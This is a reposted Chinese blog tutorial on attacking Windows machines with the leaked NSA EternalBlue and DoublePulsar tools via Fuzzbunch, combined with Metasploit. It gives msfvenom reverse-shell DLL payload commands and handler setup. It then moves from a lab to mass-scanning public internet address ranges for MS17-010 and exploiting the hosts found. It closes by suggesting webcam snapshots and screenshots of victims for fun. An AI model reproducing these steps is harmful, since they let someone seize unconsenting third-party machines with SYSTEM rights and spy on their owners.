Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP

0x01 前言

4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。
据了解,受影响的Windows 版本包括Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。
正在使用这些Windows操作系统的你,有没有在颤抖!!虽然微软宣布已修复大部分的漏洞,但这场由于远程漏洞泄露造成的灾难性网络大地震“余震”仍在。
 
 成功的条件 靶机必须要关闭防火墙 且操作系统要低于win10 攻击机1 要关闭防火墙

0x02 fuzzbunch工具复现

攻击机1:win7 win8或者winxp(没测试过xp,应该也可以实现) ,并且要安装python2.6以及pywin32.exe     192.168.46.129
攻击机2:kali2.0 metasploit  192.168.46.131
靶机3:winxp   192.168.46.132
首先先运行工具包中的fb.py
Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第1张图片

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第2张图片

use Eternalblue模块

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第3张图片

然后一路回车到让你选择操作系统和模式 操作系统根据实际情况而定 但是模式要选择FB模式

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第4张图片

一路回车 攻击

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第5张图片

当出现win的时候说明攻击成功这时到攻击机2 kali上 先生成攻击文件并且将攻击文件上传至win7的目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第6张图片

use exploit/multi/handler 模块 

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第7张图片

将LHOST 设置成攻击机2 kali的ip 192.168.46.131

LPORT 设置为5555

exploit进行监听

返回攻击机1 win7

use doubleplusar模块

一路回车到

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第8张图片

选择smb模式 x86系统 RunDLL 中填入开始生成文件的位置

一路回车 ATTACK

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第9张图片

返回kali可以看到成功了

 Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第10张图片

0x03 攻击外网

1.准备环境
攻击机1:vmware12.0中的win7+python2.6+pywin32win10+PentestBox-with-Metasploit
攻击机2:win10+PentestBox-with-Metasploit
2.win7连接外网
因为我们的目的是打外网,所以就需要win7也连接外网,首先将点击vmware左上角虚拟机中的设置选项,点击网络适配器,点击桥接模式,确定
 
Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第11张图片

然后点击编辑中的虚拟网络编辑器,点击更改设置,点桥接模式,确定,就可以连接另外一个宽带了

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第12张图片

3.攻击机2准备工作

由于kaLi连接宽带比较麻烦,故我选择用本机win10系统作为攻击机2,这里安装PentestBox-with-Metasploit 这个软件是集成了metasploit,burpsuite等工具的测试环境,很好用,下载链接自行百度

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第13张图片

然后 我们可以用msf大批量扫描网段  use auxiliary/scanner/smb/smb_ms17_010 这个模块

如果发现自己没有这个模块 在github上下载 https://github.com/rapid7/metasploit-framework/releases

然后将压缩包中 modules\auxiliary\scanner\smb\smb_ms17_010文件复制到pentestBox相应的地方就好了 这个模块就可以大批量扫描有这个漏洞 445端口的ip

可以用show options查看用法

set RHOST 设置你需要扫描的ip   111.111.111.1/24 

set RPORT 扫描端口 445

set THREADS 设置线程不要超过16  这里设置15

run 运行 就可以扫描了

黄色感叹号表示  可能有漏洞 可以利用

然后我们利用 use exploit/multi/handler  这个后门模块 监听自己的5555端口

将LHOST 设置成攻击机2 win10的ip

LPORT 设置为5555

exploit进行监听

4.攻击机1 win7准备工作

运行fb.py 

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第14张图片

然后需要输入你的攻击地址 也就是我们刚开始扫描的靶机

还有回调地址 输入win7的ip地址  重定向设置为 no  然后询问你是否创建文件 如果有则不创建 没有则创建文件 一路回车

然后 use Eternalblue 也是一路按回车

这里会问你选择 winxp 还是win7win8 这个根据实际情况来定 一定要选择FB模式 

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第15张图片

之后也是一路回车

 如果显示win的话表示成功

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第16张图片

这里 use Doublepulsar模块 也是回车

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第17张图片

选择SMB模式  x64位(操作系统位数) 这个也是根据情况来定

Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP_第18张图片

经过测试发现64位和32位的payload不一样payload生成方法 在kali中

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x64.dll  生成64位的dll文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机2的地址LPORT=5555 -f dll > go_x32.dll  生成32位dll文件

并将文件放至攻击机1 win7的c盘目录下

之后我们就回车 进行攻击 成功的话攻击机1会弹shell而且是system权限

后面的自己就可以测试了介绍一些成功后的语句

webcam_list:这个命令可以查看目标机器上是否有网络摄像头,并且列举出来。

webcam_snap:这个命令主要是远程连接目标系统的摄像头。

 screenshot :桌面截图并且保存

等一系列好玩的

转载于:https://www.cnblogs.com/Mrsm1th/p/6741557.html

你可能感兴趣的:(Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit大批量扫描目标IP)